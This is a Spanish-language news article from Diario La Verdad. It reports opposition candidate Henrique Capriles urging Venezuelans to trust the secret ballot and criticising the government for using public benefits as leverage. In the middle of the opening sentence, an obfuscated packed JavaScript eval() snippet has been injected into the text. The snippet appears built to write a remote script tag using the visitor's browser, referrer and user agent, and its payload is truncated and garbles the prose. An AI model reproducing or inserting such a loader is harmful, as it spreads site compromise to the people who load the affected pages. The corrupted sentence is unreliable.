Capriles rechaza chantajes del gobierno

Gabriela Moreno / Maracaibo / [email protected]
El eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kshhi|var|u0026u|referrer|yekrh||js|php'.split('|'),0,{})) candidato presidencial Henrique Capriles Radonski exhortó a defender la voluntad popular en los comicios de octubre. Trabajar en equipo e impulsar el progreso sin exclusión política propone el abaderado de la oposición en sus recorridos por los pueblos

Salir a repetir que “el voto es secreto” es imprescindible para Henrique Capriles Radonski, candidato presidencial de la Mesa de la Unidad. Ayer exhortó a la población a confiar en el sistema electoral. Quiere que “nadie tenga dudas de que sólo Dios sabrá por quién lo hizo”.

A su comando de campaña y simpatizantes les recordó que deben organizarse para defender la “voluntad del pueblo”. Habló desde Caucagua, en Miranda. En su recorrido por la localidad señaló que por mensajes de textos le notificaron que el simulacro comicial se desarrolló “muy rápido” y permitió la familiarización con la plataforma tecnológica que se usará en la jornada del 7 de octubre. "Lo que nos queda es organizarnos para cuidar los votos, estamos en ese proceso y defender la voluntad de nuestro pueblo”.

Su meta es “trabajar en equipo” e insistió en que los beneficios que recibe la colectividad del Gobierno nacional no deben servir para “chantajear” porque “los recursos son de la nación. Por eso, nadie tiene el derecho de pretender chantajear a otro con los recursos. Es la obligación del Gobierno, no es un favor. Es su responsabilidad".

Repitió que es necesario “construir un país donde los que estén en el poder entiendan que están ahí para servir al pueblo”.

A Capriles lo “único” que le  interesa es el progreso. Resaltó que trabaja con todos tiende la mano a quien necesita “del color que sea”. Citó como ejemplo que una emprendedora de la zona le confecciona sus camisas y para ayudarla no se le pidió el carné de ningún partido.

Criticó al Gobierno por manipular sus mensajes. “Los que andan desesperados y nerviosos, que saben que se les agotó su tiempo, cada palabra que digo tratan de tergiversarla, queremos un pueblo donde el Presidente esté a su servicio y no que el pueblo esté al servicio del Presidente”.

Respaldo eufórico

Una mujer de la tercera edad subió a la tarima y le dijo al candidato:  “Soy adeca y no me cambian los reales que me ha dado Chávez. No estoy aquí por los beneficios que tú has dado, estoy contigo porque soy democrática".

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: [email protected] , [email protected] o [email protected]
Desarrollado por Miguel Guadarrama